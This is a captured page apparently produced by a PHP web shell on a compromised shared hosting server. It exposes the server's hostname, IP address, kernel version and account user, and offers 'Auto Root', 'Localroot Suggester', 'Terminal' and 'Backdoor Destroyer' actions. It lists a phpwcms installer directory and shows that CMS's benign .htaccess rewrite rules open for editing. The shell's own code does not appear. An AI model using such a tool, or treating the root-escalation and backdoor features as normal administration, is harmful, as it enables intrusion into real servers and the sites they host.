Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.6
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
phpwcms /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-07-22 08:02
php53
[ DIR ]
drwxr-xr-x
2025-07-22 08:02
php56
[ DIR ]
drwxr-xr-x
2025-07-22 08:02
php71
[ DIR ]
drwxr-xr-x
2025-07-22 08:02
php81
[ DIR ]
drwxr-xr-x
2025-07-22 08:02
php82
[ DIR ]
drwxr-xr-x
2025-07-22 08:02
.htaccess
3.17
KB
-rw-r--r--
2024-08-26 01:09
__upgrade.php
2.52
KB
-rw-r--r--
2021-12-23 00:54
__upgrade.xml
321
B
-rw-r--r--
2021-12-23 00:54
clone.php
3.6
KB
-rw-r--r--
2025-07-21 01:33
conf.inc.php
14.23
KB
-rw-r--r--
2024-08-26 01:09
edit.php
4.39
KB
-rw-r--r--
2025-07-21 01:33
edit.xml
433
B
-rw-r--r--
2021-12-23 00:54
fileindex.php
370
B
-rw-r--r--
2022-11-03 00:48
import.php
3.56
KB
-rw-r--r--
2025-07-21 01:33
info.xml
2.49
KB
-rw-r--r--
2025-07-21 01:31
install.js
924
B
-rw-r--r--
2021-12-23 00:54
install.php
6.3
KB
-rw-r--r--
2025-07-21 01:33
install.xml
2.31
KB
-rw-r--r--
2021-12-23 00:54
md5
2.55
KB
-rw-r--r--
2025-07-21 01:33
notes.txt
777
B
-rw-r--r--
2022-11-03 00:48
phpwcms.sql
84.29
KB
-rw-r--r--
2025-07-21 01:31
phpwcms.zip
8.78
MB
-rw-r--r--
2025-07-21 01:31
Save
Rename
# Avoid accessing typical project specific IDE settings RedirectMatch 404 /\.git RedirectMatch 404 /\.idea RedirectMatch 404 /\.nova RedirectMatch 404 /\.vscode RedirectMatch 404 /\.vs # PHP: These settings are recommend - check phpinfo() before try these # register_globals ON # php_flag magic_quotes_gpc Off # php_flag magic_quotes_runtime Off # php_flag register_globals Off #Sometimes necessary to add special types # AddType application/x-javascript .js # AddType text/css .css # AddType video/ogg .ogv # AddType video/ogg .ogg # AddType video/mp4 .mp4 # AddType video/x-m4v .m4v # AddType video/webm .webm # AddType image/svg+xml .svg # AddType application/font-woff .woff # AddType application/vnd.ms-fontobject .eot # AddType application/x-font-ttf .ttf # AddType application/x-font-opentype .otf # Options: # Options +FollowSymlinks # AcceptPathInfo On # All 404 error should link to phpwcms then # it is easy to define internal routing/redirection # ErrorDocument 404 /index.php?r404 # Installed in Subfolder www.example.com/subfolder/ # ErrorDocument 404 /subfolder/index.php?r404 # Rewrite: <IfModule mod_rewrite.c> RewriteEngine On # Force everything to www. and keep or force SSL status too #RewriteCond %{HTTP_HOST} !^$ #RewriteCond %{HTTPS} off [OR] #RewriteCond %{HTTP_HOST} !^www\. [NC] #RewriteCond %{HTTPS}s ^on(s)| #RewriteRule ^ http%1://www.%{HTTP_HOST}%{REQUEST_URI} [R=301,L] #RewriteRule ^(.*)$ https://www.%{HTTP_HOST}%{REQUEST_URI} [R=301,L] # Some more simple redirect example #RewriteCond %{HTTP_HOST} ^example.com [OR] #RewriteCond %{HTTP_HOST} ^example-two.com [OR] #RewriteCond %{HTTP_HOST} ^www.example-two.de [OR] #RewriteCond %{SERVER_PORT} 80 #RewriteRule ^(.*)$ https://www.example.com/$1 [R=301,L] DirectoryIndex index.html index.php index.phtml # Redirect /en and /en/ to english home #RewriteRule ^(en|de)(/{0,1})$ ./index.php?$1/index [L,QSA] # Use RewriteBase - always start in Document Root #RewriteBase / # If installed in a subfolder RewriteBase [[relativeurl]]/ # Resized image /img/cmsimage.php/… -> /im/… RewriteRule ^im\/(.+?)$ ./img/cmsimage.php?$1 [L] # File download /dl/… -> /download.php?… RewriteRule ^dl\/([a-fA-Z0-9]+)\/(.*?)$ ./download.php?f=$1&%{QUERY_STRING} [L] # Stop rewrite processing, if we are in any known directory # NOTE: Add your additional local storages here RewriteRule ^(?:template/|content/|picture/|uploads/|include/|filearchive/|img/) - [L] # Ignore all files and folders that exists RewriteCond %{REQUEST_FILENAME} -f [OR] RewriteCond %{REQUEST_FILENAME} -d RewriteRule ^(.+) - [PT,L] # In case of config setting `$phpwcms['rewrite_ext']='.html'` -> /alias.html (Default) RewriteRule ^(.+)\.[p]{0,1}html$ ./index.php?$1&%{QUERY_STRING} [L] RewriteRule ^([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)\.[p]{0,1}html$ ./index.php?id=$1,$2,$3,$4,$5,$6&%{QUERY_STRING} [L] # Rewrite anything else and link it against phpwcms # Check redirect settings under admin in the backend RewriteRule ^(.+)/?$ ./index.php?$1&%{QUERY_STRING} </IfModule>